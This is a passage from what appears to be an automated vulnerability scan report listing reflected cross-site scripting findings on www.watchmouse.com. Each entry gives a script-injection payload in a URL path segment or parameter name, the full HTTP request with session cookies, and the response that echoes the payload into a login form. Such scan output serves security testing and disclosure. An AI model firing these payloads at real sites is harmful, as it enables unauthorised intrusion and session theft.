<form id="login_form" action="https://secure.watchmouse.com/fr/?75c03"><script>alert(1)</script>df6e6da6b47=1" method="post">
...[SNIP]...

1.268. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6190c"><script>alert(1)</script>eec7a902b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr6190c"><script>alert(1)</script>eec7a902b5/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f6acb9ac00e8013f53a636ce456c4db9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fr6190c"><script>alert(1)</script>eec7a902b5/feature/public-status-page.html" method="post">
...[SNIP]...

1.269. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66edf"><script>alert(1)</script>45eca1981d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature66edf"><script>alert(1)</script>45eca1981d1/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:07 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-8efe6f809bd26933168e0ec812f4ee50"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature66edf"><script>alert(1)</script>45eca1981d1/public-status-page.html" method="post">
...[SNIP]...

1.270. http://www.watchmouse.com/fr/feature/public-status-page.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39421"><script>alert(1)</script>6105484ac02 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature/public-status-page.html39421"><script>alert(1)</script>6105484ac02 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-ef9ed640b33a089b2db418c8c9bfd342"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature/public-status-page.html39421"><script>alert(1)</script>6105484ac02" method="post">
...[SNIP]...

1.271. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3aaf"><script>alert(1)</script>b57c476554f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /frc3aaf"><script>alert(1)</script>b57c476554f/feature/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-84df100d59952cfec952573fa14e96fe"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/frc3aaf"><script>alert(1)</script>b57c476554f/feature/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.272. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9584a"><script>alert(1)</script>50ff984e50c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature9584a"><script>alert(1)</script>50ff984e50c/transaction-monitoring-web-application-testing.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-18071240ca507f19649141ff12cf18c5"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature9584a"><script>alert(1)</script>50ff984e50c/transaction-monitoring-web-application-testing.html" method="post">
...[SNIP]...

1.273. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ac2f"><script>alert(1)</script>9c27d6a2c4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature/transaction-monitoring-web-application-testing.html8ac2f"><script>alert(1)</script>9c27d6a2c4f HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-038f2880e9e815a8e39470a1faaeb92b"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html8ac2f"><script>alert(1)</script>9c27d6a2c4f" method="post">
...[SNIP]...

1.274. http://www.watchmouse.com/fr/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/feature/transaction-monitoring-web-application-testing.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fa4d"><script>alert(1)</script>10bfb984279 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/feature/transaction-monitoring-web-application-testing.html?8fa4d"><script>alert(1)</script>10bfb984279=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-ecb86086049dc0cec5c4cccbe2764886"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="/fr/feature/transaction-monitoring-web-application-testing.html?8fa4d"><script>alert(1)</script>10bfb984279=1" method="post">
...[SNIP]...

1.275. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1a4"><script>alert(1)</script>c0f84162fa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr8a1a4"><script>alert(1)</script>c0f84162fa5/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-762d521553a57e587d807a583139a2db"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fr8a1a4"><script>alert(1)</script>c0f84162fa5/learn_more.php" method="post">
...[SNIP]...

1.276. http://www.watchmouse.com/fr/learn_more.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ae"><script>alert(1)</script>3996de4c4ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/learn_more.phpb38ae"><script>alert(1)</script>3996de4c4ee HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-1deabc1eff11deab31ac7e37c1a32582"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/learn_more.phpb38ae"><script>alert(1)</script>3996de4c4ee" method="post">
...[SNIP]...

1.277. http://www.watchmouse.com/fr/learn_more.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dec2"><script>alert(1)</script>06ec13112a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/learn_more.php?9dec2"><script>alert(1)</script>06ec13112a9=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:44 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:08:45 GMT
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/learn_more.php?9dec2"><script>alert(1)</script>06ec13112a9=1" method="post">
...[SNIP]...

1.278. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/plans_price.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be5b"><script>alert(1)</script>540718cc860 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr7be5b"><script>alert(1)</script>540718cc860/plans_price.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:39 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-759719879a47ce6d5e21332f64679a8e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fr7be5b"><script>alert(1)</script>540718cc860/plans_price.php" method="post">
...[SNIP]...

1.279. http://www.watchmouse.com/fr/plans_price.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/plans_price.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e0b"><script>alert(1)</script>6b17afa84b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/plans_price.php19e0b"><script>alert(1)</script>6b17afa84b5 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-db3d563554ac0e2e4e6058e2a7f097e8"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/plans_price.php19e0b"><script>alert(1)</script>6b17afa84b5" method="post">
...[SNIP]...

1.280. http://www.watchmouse.com/fr/plans_price.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/plans_price.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 921a1"><script>alert(1)</script>8cd8928a867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/plans_price.php?921a1"><script>alert(1)</script>8cd8928a867=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:08:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-fr-bc621a7923eeda7116213e0d493b6376"
Content-Language: fr
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/fr/plans_price.php?921a1"><script>alert(1)</script>8cd8928a867=1" method="post">
...[SNIP]...

1.281. http://www.watchmouse.com/fr/register.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /fr/register.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5250b"><script>alert(1)</script>2f139ca9dcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /fr5250b"><script>alert(1)</script>2f139ca9dcd/register.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:09:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e410a2a627f3284430ee209709af2c3f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
